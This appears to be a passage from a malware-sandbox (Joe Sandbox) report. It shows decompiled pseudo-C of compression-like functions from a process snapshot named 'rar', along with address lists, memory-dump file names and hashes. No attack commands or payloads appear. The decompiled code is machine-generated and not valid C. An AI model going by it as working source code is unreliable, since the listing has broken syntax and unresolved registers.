				r14d = r14d ^  *(_t231 + _t229 + 4) & 0x000000ff;
				r14d = r14d & _v88;
				if (_t157 - _t176 << 7 > 0) goto 0x50b3c647;
				if (_t157 - _v76 > 0) goto 0x50b3c647;
				if (_t157 == 0) goto 0x50b3c647;
				if (_t218 * 4 - _t176 < 0) goto 0x50b3c661;
				r15d =  *(__rdx + 0x8050);
				if (r9d - r15d <= 0) goto 0x50b3c618;
				if (_t157 - _t176 < 0) goto 0x50b3c661;
				_t210 = r9d - _t235 + 1;
				if (_t210 > 0) goto 0x50b3c661;
				r9d = __r11 + _t224;
				r9d = r9d & r12d;
				_v80 = _v80 + 0xffffffff;
				r9d =  *(_v64 + _t213 * 4);
				if (_t210 != 0) goto 0x50b3c449;
				return 0;
			}



































                                                                                                            0x7ff650b3c30c
                                                                                                            0x7ff650b3c30c
                                                                                                            0x7ff650b3c30c
                                                                                                            0x7ff650b3c320
                                                                                                            0x7ff650b3c332
                                                                                                            0x7ff650b3c33e
                                                                                                            0x7ff650b3c34a
                                                                                                            0x7ff650b3c356
                                                                                                            0x7ff650b3c362
                                                                                                            0x7ff650b3c36f
                                                                                                            0x7ff650b3c375
                                                                                                            0x7ff650b3c37c
                                                                                                            0x7ff650b3c37f
                                                                                                            0x7ff650b3c386
                                                                                                            0x7ff650b3c389
                                                                                                            0x7ff650b3c390
                                                                                                            0x7ff650b3c397
                                                                                                            0x7ff650b3c39e
                                                                                                            0x7ff650b3c3a5
                                                                                                            0x7ff650b3c3a8
                                                                                                            0x7ff650b3c3b0
                                                                                                            0x7ff650b3c3b5
                                                                                                            0x7ff650b3c3ba
                                                                                                            0x7ff650b3c3be
                                                                                                            0x7ff650b3c3c9
                                                                                                            0x7ff650b3c3cc
                                                                                                            0x7ff650b3c3d6
                                                                                                            0x7ff650b3c3da
                                                                                                            0x7ff650b3c403
                                                                                                            0x7ff650b3c40a
                                                                                                            0x7ff650b3c40d
                                                                                                            0x7ff650b3c410
                                                                                                            0x7ff650b3c417
                                                                                                            0x7ff650b3c41b
                                                                                                            0x7ff650b3c421
                                                                                                            0x7ff650b3c42f
                                                                                                            0x7ff650b3c439
                                                                                                            0x7ff650b3c43f
                                                                                                            0x7ff650b3c445
                                                                                                            0x7ff650b3c44f
                                                                                                            0x7ff650b3c454
                                                                                                            0x7ff650b3c461
                                                                                                            0x7ff650b3c467
                                                                                                            0x7ff650b3c46a
                                                                                                            0x7ff650b3c475
                                                                                                            0x7ff650b3c4bb
                                                                                                            0x7ff650b3c4d7
                                                                                                            0x7ff650b3c4e1
                                                                                                            0x7ff650b3c4e4
                                                                                                            0x7ff650b3c4ea
                                                                                                            0x7ff650b3c4f1
                                                                                                            0x7ff650b3c4f5
                                                                                                            0x7ff650b3c502
                                                                                                            0x7ff650b3c504
                                                                                                            0x7ff650b3c507
                                                                                                            0x7ff650b3c516
                                                                                                            0x7ff650b3c522
                                                                                                            0x7ff650b3c528
                                                                                                            0x7ff650b3c52d
                                                                                                            0x7ff650b3c52d
                                                                                                            0x7ff650b3c531
                                                                                                            0x7ff650b3c534
                                                                                                            0x7ff650b3c538
                                                                                                            0x7ff650b3c538
                                                                                                            0x7ff650b3c53f
                                                                                                            0x7ff650b3c54d
                                                                                                            0x7ff650b3c552
                                                                                                            0x7ff650b3c568
                                                                                                            0x7ff650b3c570
                                                                                                            0x7ff650b3c573
                                                                                                            0x7ff650b3c577
                                                                                                            0x7ff650b3c57d
                                                                                                            0x7ff650b3c57f
                                                                                                            0x7ff650b3c585
                                                                                                            0x7ff650b3c589
                                                                                                            0x7ff650b3c58c
                                                                                                            0x7ff650b3c597
                                                                                                            0x7ff650b3c5c4
                                                                                                            0x7ff650b3c5d3
                                                                                                            0x7ff650b3c5df
                                                                                                            0x7ff650b3c5e2
                                                                                                            0x7ff650b3c5e7
                                                                                                            0x7ff650b3c5f1
                                                                                                            0x7ff650b3c5f7
                                                                                                            0x7ff650b3c5fb
                                                                                                            0x7ff650b3c606
                                                                                                            0x7ff650b3c608
                                                                                                            0x7ff650b3c612
                                                                                                            0x7ff650b3c616
                                                                                                            0x7ff650b3c61c
                                                                                                            0x7ff650b3c61f
                                                                                                            0x7ff650b3c621
                                                                                                            0x7ff650b3c629
                                                                                                            0x7ff650b3c62c
                                                                                                            0x7ff650b3c639
                                                                                                            0x7ff650b3c641
                                                                                                            0x7ff650b3c660

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a2fb9c3432bd5fbdbbcc9b57cd8c6e63f1aaa1b67a5a0cbaa6241bfbe67a1a98
                                                                                                            • Instruction ID: 953cccbc5cc26414d42a21e42b7ab99bf077e9be44e710a1011f3d9428d7cf34
                                                                                                            • Opcode Fuzzy Hash: a2fb9c3432bd5fbdbbcc9b57cd8c6e63f1aaa1b67a5a0cbaa6241bfbe67a1a98
                                                                                                            • Instruction Fuzzy Hash: 8291E4336080D24BD7A98F25D155ABE7B91F389744F299135DA8B97B84DE3EE844CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B22140 Relevance: .2, Instructions: 210COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E00007FF67FF650B22140(long long __rbx, void* __rcx, unsigned int __rdx, long long __rdi, long long __rsi) {
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t147;
				char _t164;
				signed char _t173;
				signed int _t174;
				void* _t199;
				signed long long _t200;
				unsigned long long _t202;
				unsigned long long _t209;
				signed long long _t210;
				void* _t212;
				signed long long _t218;
				unsigned int _t235;
				void* _t241;
				void* _t243;
				signed long long _t244;
				void* _t246;
				intOrPtr* _t247;
				void* _t253;
				void* _t260;
				void* _t262;

				_t225 = __rdx;
				_t199 = _t243;
				 *((long long*)(_t199 + 8)) = __rbx;
				 *((long long*)(_t199 + 0x18)) = __rsi;
				 *((long long*)(_t199 + 0x20)) = __rdi;
				_push(_t262);
				_t241 = _t199 - 0x5b8;
				_t244 = _t243 - 0x6a0;
				_t200 =  *0x50b978f0; // 0x27db226282f1
				 *(_t241 + 0x590) = _t200 ^ _t244;
				_t235 = __rdx;
				r14d = 1;
				if ( *((intOrPtr*)(__rcx + 0x1c)) <= 0) goto 0x50b22193;
				_t202 =  *((intOrPtr*)(__rdx + 8));
				if ( *_t202 != 5) goto 0x50b22193;
				goto 0x50b22195;
				 *((char*)(__rdx + 0x850)) = 0;
				 *((char*)(__rdx + 0x9ec)) = 0;
				r8d = 0x4ac;
				_t123 = E00007FF67FF650B6C1A0(0, 0, _t241 + 0xe0, __rdx, _t246);
				r8d = 0xf0;
				_t124 = E00007FF67FF650B6C1A0(_t123, 0, _t241 - 0x10, __rdx, _t246);
				_t13 = _t225 + 0x70; // 0x70
				r8d = _t13;
				_t125 = E00007FF67FF650B6C1A0(_t124, 0, _t241 - 0x80, __rdx, _t246);
				_t218 = _t244 + 0x30;
				_t15 = _t225 + 0x44; // 0x44
				r8d = _t15;
				E00007FF67FF650B6C1A0(_t125, 0, _t218, __rdx, _t246);
				_t247 =  *((intOrPtr*)(__rdx + 8));
				r11b = 0;
				r9b = 0;
				_t212 = _t247 + _t202 * 8;
				if (_t247 - _t212 >= 0) goto 0x50b223ad;
				if ( *_t247 != 0) goto 0x50b2221c;
				goto 0x50b22341;
				if (( *(_t247 + 4) & 0x000000ff) != r14b) goto 0x50b2231d;
				if (( *(_t247 + 1) & 0x000000ff) - 0x20 >= 0) goto 0x50b22239;
				goto 0x50b22246;
				 *((intOrPtr*)(_t241 + 0x51c + (_t202 >> 3) * 4)) =  *((intOrPtr*)(_t241 + 0x51c + (_t202 >> 3) * 4)) + r14d;
				_t173 =  *(_t247 + 4);
				if (_t173 - 0x40 >= 0) goto 0x50b22262;
				goto 0x50b222be;
				if (_t173 - 0x800 >= 0) goto 0x50b2227c;
				goto 0x50b222be;
				if (_t173 - 0x10000 >= 0) goto 0x50b22296;
				goto 0x50b222be;
				if (_t173 - 0x20000 >= 0) goto 0x50b222a8;
				goto 0x50b222be;
				if (_t173 - 0x100000 >= 0) goto 0x50b222b8;
				goto 0x50b222be;
				_t164 = (((_t173 >> 0xf) + 0x1e >> 0x10) + 0x20 >> 0x12) + 0x2c;
				 *((intOrPtr*)(_t241 + _t218 * 4 - 0x10)) =  *((intOrPtr*)(_t241 + _t218 * 4 - 0x10)) + r14d;
				if (_t164 - 9 <= 0) goto 0x50b2230f;
				_t174 = _t173 & 0x0000000f;
				 *((intOrPtr*)(_t244 + 0x30 + (__rdx >> 0xa) * 4)) =  *((intOrPtr*)(_t244 + 0x30 + (__rdx >> 0xa) * 4)) + r14d;
				if (_t174 != r11b) goto 0x50b222f0;
				if (r9b - 0x10 >= 0) goto 0x50b222f4;
				r9b = r9b + r14b;
				_t209 =  !=  ?  *((intOrPtr*)(_t244 + 0x20)) : _t247;
				_t259 = _t209;
				goto 0x50b2230f;
				if (r9b != 0x10) goto 0x50b22309;
				 *((intOrPtr*)(_t244 + 0x30 + _t209 * 4)) =  *((intOrPtr*)(_t244 + 0x30 + _t209 * 4)) + 0xfffffff0;
				 *((intOrPtr*)(_t244 + 0x70)) =  *((intOrPtr*)(_t244 + 0x70)) + r14d;
				 *((char*)(_t209 + 3)) = 0x10;
				r9b = 0;
				r11b = _t174;
				 *((char*)(_t247 + 2)) = _t164;
				 *((char*)(_t247 + 3)) = 0;
				goto 0x50b223a0;
				if ((r11b & 0xffffffff) != 2) goto 0x50b2234b;
				if ( *(_t247 + 4) - 0x20 >= 0) goto 0x50b22335;
				goto 0x50b2233b;
				_t139 = _t209 + 0x107;
				 *((intOrPtr*)(_t241 + 0xe0 + _t209 * 4)) =  *((intOrPtr*)(_t241 + 0xe0 + _t209 * 4)) + r14d;
				goto 0x50b223a0;
				if (_t139 != 3) goto 0x50b22358;
				 *((intOrPtr*)(_t241 + 0x4e8)) =  *((intOrPtr*)(_t241 + 0x4e8)) + r14d;
				goto 0x50b223a0;
				if (_t139 != 4) goto 0x50b22395;
				 *((intOrPtr*)(_t241 + 0xe0 + _t209 * 4)) =  *((intOrPtr*)(_t241 + 0xe0 + _t209 * 4)) + r14d;
				if (( *(_t247 + 1) & 0x000000ff) - 0x20 >= 0) goto 0x50b22381;
				goto 0x50b2238e;
				_t210 = _t209 >> 3;
				 *((intOrPtr*)(_t241 + _t210 * 4 - 0x80)) =  *((intOrPtr*)(_t241 + _t210 * 4 - 0x80)) + r14d;
				goto 0x50b223a0;
				if (( *(_t210 + 0x7ff650b95020) & 0x000000ff) != 7) goto 0x50b223a0;
				 *((intOrPtr*)(_t241 + 0x4e4)) =  *((intOrPtr*)(_t241 + 0x4e4)) + r14d;
				_t248 = _t247 + 8;
				if (_t247 + 8 - _t212 < 0) goto 0x50b2220b;
				 *((intOrPtr*)(_t241 + 0x4e0)) = r14d;
				r8d = 0x12b;
				_t145 = E00007FF67FF650B22534( *(_t210 + 0x7ff650b95020) & 0x000000ff, _t241 + 0xe0, _t247 + 8, _t253);
				r14d = 0x3c;
				r8d = r14d;
				_t146 = E00007FF67FF650B22534(_t145, _t241 - 0x10, _t247 + 8, _t253);
				r15d = _t262 - 0x2b;
				r8d = r15d;
				_t147 = E00007FF67FF650B22534(_t146, _t244 + 0x30, _t247 + 8, _t253);
				r8d = _t262 - 0x20;
				E00007FF67FF650B22534(_t147, _t241 - 0x80, _t248, _t253);
				_t103 = _t235 + 0x40; // 0x40
				_t104 = _t235 + 0x690; // 0x690
				E00007FF67FF650B385A0(0x12b, _t210, _t212, _t241 + 0xe0, _t104, _t103, _t209, _t260);
				_t106 = _t235 + 0x4ec; // 0x4ec
				_t107 = _t235 + 0x7bb; // 0x7bb
				E00007FF67FF650B385A0(r14d, _t210, _t212, _t241 - 0x10, _t107, _t106, _t209, _t260);
				_t109 = _t235 + 0x5dc; // 0x5dc
				_t110 = _t235 + 0x7f7; // 0x7f7
				E00007FF67FF650B385A0(r15d, _t210, _t212, _t244 + 0x30, _t110, _t109, _t259, _t260);
				_t112 = _t235 + 0x620; // 0x620
				_t113 = _t235 + 0x808; // 0x808
				return E00007FF67FF650B69D10(E00007FF67FF650B385A0(_t262 - 0x20, _t210, _t212, _t241 - 0x80, _t113, _t112, _t259, _t260), _t262 - 0x20,  *(_t241 + 0x590) ^ _t244);
			}





























                                                                                                            0x7ff650b22140
                                                                                                            0x7ff650b22140
                                                                                                            0x7ff650b22143
                                                                                                            0x7ff650b22147
                                                                                                            0x7ff650b2214b
                                                                                                            0x7ff650b22150
                                                                                                            0x7ff650b22154
                                                                                                            0x7ff650b2215b
                                                                                                            0x7ff650b22162
                                                                                                            0x7ff650b2216c
                                                                                                            0x7ff650b22177
                                                                                                            0x7ff650b2217d
                                                                                                            0x7ff650b22183
                                                                                                            0x7ff650b22185
                                                                                                            0x7ff650b2218c
                                                                                                            0x7ff650b22191
                                                                                                            0x7ff650b22195
                                                                                                            0x7ff650b221a2
                                                                                                            0x7ff650b221a8
                                                                                                            0x7ff650b221b0
                                                                                                            0x7ff650b221bb
                                                                                                            0x7ff650b221c1
                                                                                                            0x7ff650b221cc
                                                                                                            0x7ff650b221cc
                                                                                                            0x7ff650b221d0
                                                                                                            0x7ff650b221d7
                                                                                                            0x7ff650b221dc
                                                                                                            0x7ff650b221dc
                                                                                                            0x7ff650b221e0
                                                                                                            0x7ff650b221e5
                                                                                                            0x7ff650b221e9
                                                                                                            0x7ff650b221ef
                                                                                                            0x7ff650b221f2
                                                                                                            0x7ff650b221f9
                                                                                                            0x7ff650b22210
                                                                                                            0x7ff650b22217
                                                                                                            0x7ff650b2221f
                                                                                                            0x7ff650b2222c
                                                                                                            0x7ff650b22237
                                                                                                            0x7ff650b22246
                                                                                                            0x7ff650b2224e
                                                                                                            0x7ff650b22255
                                                                                                            0x7ff650b22260
                                                                                                            0x7ff650b22268
                                                                                                            0x7ff650b2227a
                                                                                                            0x7ff650b22282
                                                                                                            0x7ff650b22294
                                                                                                            0x7ff650b2229e
                                                                                                            0x7ff650b222a6
                                                                                                            0x7ff650b222ae
                                                                                                            0x7ff650b222b6
                                                                                                            0x7ff650b222bb
                                                                                                            0x7ff650b222be
                                                                                                            0x7ff650b222c6
                                                                                                            0x7ff650b222c8
                                                                                                            0x7ff650b222ce
                                                                                                            0x7ff650b222d6
                                                                                                            0x7ff650b222dc
                                                                                                            0x7ff650b222de
                                                                                                            0x7ff650b222e7
                                                                                                            0x7ff650b222eb
                                                                                                            0x7ff650b222ee
                                                                                                            0x7ff650b222f4
                                                                                                            0x7ff650b222fa
                                                                                                            0x7ff650b222ff
                                                                                                            0x7ff650b22304
                                                                                                            0x7ff650b22309
                                                                                                            0x7ff650b2230c
                                                                                                            0x7ff650b2230f
                                                                                                            0x7ff650b22313
                                                                                                            0x7ff650b22318
                                                                                                            0x7ff650b2231f
                                                                                                            0x7ff650b22328
                                                                                                            0x7ff650b22333
                                                                                                            0x7ff650b2233b
                                                                                                            0x7ff650b22341
                                                                                                            0x7ff650b22349
                                                                                                            0x7ff650b2234d
                                                                                                            0x7ff650b2234f
                                                                                                            0x7ff650b22356
                                                                                                            0x7ff650b2235a
                                                                                                            0x7ff650b22365
                                                                                                            0x7ff650b22374
                                                                                                            0x7ff650b2237f
                                                                                                            0x7ff650b22381
                                                                                                            0x7ff650b2238e
                                                                                                            0x7ff650b22393
                                                                                                            0x7ff650b22397
                                                                                                            0x7ff650b22399
                                                                                                            0x7ff650b223a0
                                                                                                            0x7ff650b223a7
                                                                                                            0x7ff650b223b2
                                                                                                            0x7ff650b223b9
                                                                                                            0x7ff650b223c6
                                                                                                            0x7ff650b223cb
                                                                                                            0x7ff650b223d5
                                                                                                            0x7ff650b223db
                                                                                                            0x7ff650b223e0
                                                                                                            0x7ff650b223e7
                                                                                                            0x7ff650b223ef
                                                                                                            0x7ff650b223f4
                                                                                                            0x7ff650b223ff
                                                                                                            0x7ff650b22404
                                                                                                            0x7ff650b2240a
                                                                                                            0x7ff650b22418
                                                                                                            0x7ff650b2241d
                                                                                                            0x7ff650b22427
                                                                                                            0x7ff650b22432
                                                                                                            0x7ff650b22437
                                                                                                            0x7ff650b22441
                                                                                                            0x7ff650b2244d
                                                                                                            0x7ff650b22452
                                                                                                            0x7ff650b22459
                                                                                                            0x7ff650b22498

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d6776002a8524b38f23985cf5567b0be3b661979e5ba0a99c03ffd259743d90
                                                                                                            • Instruction ID: 40f3c279991b49cbfa90aecc902994173cd04f4315cfa0ace61c53cfb5ffcf48
                                                                                                            • Opcode Fuzzy Hash: 4d6776002a8524b38f23985cf5567b0be3b661979e5ba0a99c03ffd259743d90
                                                                                                            • Instruction Fuzzy Hash: 8E91B062A08697BAEF648B25C8807FC3761F756744F884032DA4BF7785DE3AE655CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5E91C Relevance: .2, Instructions: 209COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00007FF67FF650B5E91C(signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t214;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				intOrPtr _t229;
				void* _t237;
				void* _t247;
				void* _t254;
				signed long long _t261;
				void* _t266;
				signed long long _t268;
				signed int* _t272;
				signed long long _t277;

				_t266 = __rdx;
				_t261 = _t277;
				 *((long long*)(_t261 + 8)) = __rbx;
				 *((long long*)(_t261 + 0x10)) = __rbp;
				 *((long long*)(_t261 + 0x18)) = __rsi;
				 *((long long*)(_t261 + 0x20)) = __rdi;
				_t268 = _t261 * 0x5c;
				_t272 = __rcx + 0x98fc + _t268;
				r8d =  *(_t268 + __rcx + 0x98f4);
				r9d = r8d;
				r9d = r9d -  *(_t268 + __rcx + 0x98e4);
				r10d =  *(_t268 + __rcx + 0x98e8);
				r11d =  *(_t268 + __rcx + 0x98ec);
				 *(_t268 + __rcx + 0x9924) =  *(_t268 + __rcx + 0x9924) + 1;
				 *(_t268 + __rcx + 0x98e8) = r9d;
				 *(_t268 + __rcx + 0x98f0) = r11d;
				 *(_t268 + __rcx + 0x98ec) = r10d;
				 *(_t268 + __rcx + 0x98e4) = r8d;
				_t225 = _t261 * 8;
				asm("cdq");
				 *(_t268 + __rcx + 0x98f8) =  *(_t268 + __rcx + 0x98f8) + (_t225 ^ __edx) - __edx;
				asm("cdq");
				 *_t272 =  *_t272 + (_t225 - r8d ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9900)) =  *((intOrPtr*)(_t268 + __rcx + 0x9900)) + (__r8 + __rcx ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9904)) =  *((intOrPtr*)(_t268 + __rcx + 0x9904)) + (_t225 - r9d ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9908)) =  *((intOrPtr*)(_t268 + __rcx + 0x9908)) + (__r9 + __rcx ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x990c)) =  *((intOrPtr*)(_t268 + __rcx + 0x990c)) + (_t225 - r10d ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9910)) =  *((intOrPtr*)(_t268 + __rcx + 0x9910)) + (__r10 + __rcx ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9914)) =  *((intOrPtr*)(_t268 + __rcx + 0x9914)) + (_t225 - r11d ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9918)) =  *((intOrPtr*)(_t268 + __rcx + 0x9918)) + (__r11 + __rcx ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x991c)) =  *((intOrPtr*)(_t268 + __rcx + 0x991c)) + (_t225 -  *(__rcx + 0x98cc) ^ __edx) - __edx;
				asm("cdq");
				 *((intOrPtr*)(_t268 + __rcx + 0x9920)) =  *((intOrPtr*)(_t268 + __rcx + 0x9920)) + ( *(__rcx + 0x98cc) + _t225 ^ __edx) - __edx;
				_t226 = bpl -  *((intOrPtr*)(_t268 + __rcx + 0x9928));
				 *(_t268 + __rcx + 0x98f4) = _t226;
				 *(__rcx + 0x98cc) = _t226;
				 *((intOrPtr*)(_t268 + __rcx + 0x9928)) = (__rcx + _t261 * 0x00000008 >> 0x00000003 & 0x000000ff) - __edx;
				if (( *(_t268 + __rcx + 0x9924) & 0x0000001f) != 0) goto 0x50b5ec30;
				r8d =  *(_t268 + __rcx + 0x98f8);
				 *(_t268 + __rcx + 0x98f8) =  *(_t268 + __rcx + 0x98f8) & 0;
				_t106 = _t266 + 1; // 0x1
				r9d = _t106;
				_t227 =  *_t272;
				_t197 =  >=  ? 0 : r9d;
				 *_t272 =  *_t272 & 0x00000000;
				r9d = r9d + 1;
				_t228 =  >=  ? r8d : _t227;
				r8d =  >=  ? r8d : _t227;
				if (r9d - 0xb < 0) goto 0x50b5eae7;
				_t247 = _t197 - 6;
				if (_t247 > 0) goto 0x50b5ebc9;
				if (_t247 == 0) goto 0x50b5ebb9;
				if (_t247 == 0) goto 0x50b5eb9e;
				if (_t247 == 0) goto 0x50b5eb8a;
				if (_t247 == 0) goto 0x50b5eb6c;
				_t237 = _t197 - 0xfffffffffffffffe;
				if (_t247 == 0) goto 0x50b5eb58;
				if (_t237 != 1) goto 0x50b5ec30;
				_t198 =  *((intOrPtr*)(_t268 + __rcx + 0x98d8));
				if (_t198 - 0xfffffff0 < 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98d8)) = _t198 - 1;
				goto 0x50b5ec30;
				if ( *((intOrPtr*)(_t268 + __rcx + 0x98d4)) - 0x10 >= 0) goto 0x50b5ec30;
				goto 0x50b5eb7e;
				_t202 =  *((intOrPtr*)(_t268 + __rcx + 0x98d4));
				if (_t202 - 0xfffffff0 < 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98d4)) = _t202 - 1;
				goto 0x50b5ec30;
				if ( *((intOrPtr*)(_t268 + __rcx + 0x98d0)) - 0x10 >= 0) goto 0x50b5ec30;
				goto 0x50b5ebb0;
				_t206 =  *((intOrPtr*)(_t268 + __rcx + 0x98d0));
				if (_t206 - 0xfffffff0 < 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98d0)) = _t206 - 1;
				goto 0x50b5ec30;
				_t254 =  *((intOrPtr*)(_t268 + __rcx + 0x98d8)) - 0x10;
				if (_t254 >= 0) goto 0x50b5ec30;
				goto 0x50b5eb4c;
				if (_t254 == 0) goto 0x50b5ec1b;
				if (_t254 == 0) goto 0x50b5ec04;
				if (_t254 == 0) goto 0x50b5ebf4;
				if (_t237 - 5 != 1) goto 0x50b5ec30;
				_t210 =  *((intOrPtr*)(_t268 + __rcx + 0x98e0));
				if (_t210 - 0x10 >= 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98e0)) = _t210 + 1;
				goto 0x50b5ec30;
				if ( *((intOrPtr*)(_t268 + __rcx + 0x98e0)) - 0xfffffff0 < 0) goto 0x50b5ec30;
				goto 0x50b5ebeb;
				_t214 =  *((intOrPtr*)(_t268 + __rcx + 0x98dc));
				if (_t214 - 0x10 >= 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98dc)) = _t214 + 1;
				goto 0x50b5ec30;
				_t229 =  *((intOrPtr*)(_t268 + __rcx + 0x98dc));
				if (_t229 - 0xfffffff0 < 0) goto 0x50b5ec30;
				 *((intOrPtr*)(_t268 + __rcx + 0x98dc)) = _t229 - 1;
				return bpl;
			}





















                                                                                                            0x7ff650b5e91c
                                                                                                            0x7ff650b5e91c
                                                                                                            0x7ff650b5e91f
                                                                                                            0x7ff650b5e923
                                                                                                            0x7ff650b5e927
                                                                                                            0x7ff650b5e92b
                                                                                                            0x7ff650b5e938
                                                                                                            0x7ff650b5e943
                                                                                                            0x7ff650b5e946
                                                                                                            0x7ff650b5e94e
                                                                                                            0x7ff650b5e951
                                                                                                            0x7ff650b5e959
                                                                                                            0x7ff650b5e961
                                                                                                            0x7ff650b5e969
                                                                                                            0x7ff650b5e977
                                                                                                            0x7ff650b5e97f
                                                                                                            0x7ff650b5e987
                                                                                                            0x7ff650b5e98f
                                                                                                            0x7ff650b5e9e7
                                                                                                            0x7ff650b5e9f0
                                                                                                            0x7ff650b5e9f5
                                                                                                            0x7ff650b5ea01
                                                                                                            0x7ff650b5ea06
                                                                                                            0x7ff650b5ea0c
                                                                                                            0x7ff650b5ea11
                                                                                                            0x7ff650b5ea1d
                                                                                                            0x7ff650b5ea22
                                                                                                            0x7ff650b5ea2d
                                                                                                            0x7ff650b5ea32
                                                                                                            0x7ff650b5ea3e
                                                                                                            0x7ff650b5ea43
                                                                                                            0x7ff650b5ea4e
                                                                                                            0x7ff650b5ea53
                                                                                                            0x7ff650b5ea5f
                                                                                                            0x7ff650b5ea64
                                                                                                            0x7ff650b5ea6f
                                                                                                            0x7ff650b5ea74
                                                                                                            0x7ff650b5ea83
                                                                                                            0x7ff650b5ea88
                                                                                                            0x7ff650b5ea97
                                                                                                            0x7ff650b5ea9c
                                                                                                            0x7ff650b5eaad
                                                                                                            0x7ff650b5eab0
                                                                                                            0x7ff650b5eab7
                                                                                                            0x7ff650b5eac5
                                                                                                            0x7ff650b5eacc
                                                                                                            0x7ff650b5ead2
                                                                                                            0x7ff650b5eadc
                                                                                                            0x7ff650b5eae3
                                                                                                            0x7ff650b5eae3
                                                                                                            0x7ff650b5eae7
                                                                                                            0x7ff650b5eaef
                                                                                                            0x7ff650b5eaf2
                                                                                                            0x7ff650b5eaf5
                                                                                                            0x7ff650b5eb01
                                                                                                            0x7ff650b5eb05
                                                                                                            0x7ff650b5eb0c
                                                                                                            0x7ff650b5eb0e
                                                                                                            0x7ff650b5eb11
                                                                                                            0x7ff650b5eb17
                                                                                                            0x7ff650b5eb20
                                                                                                            0x7ff650b5eb25
                                                                                                            0x7ff650b5eb2a
                                                                                                            0x7ff650b5eb2c
                                                                                                            0x7ff650b5eb2f
                                                                                                            0x7ff650b5eb34
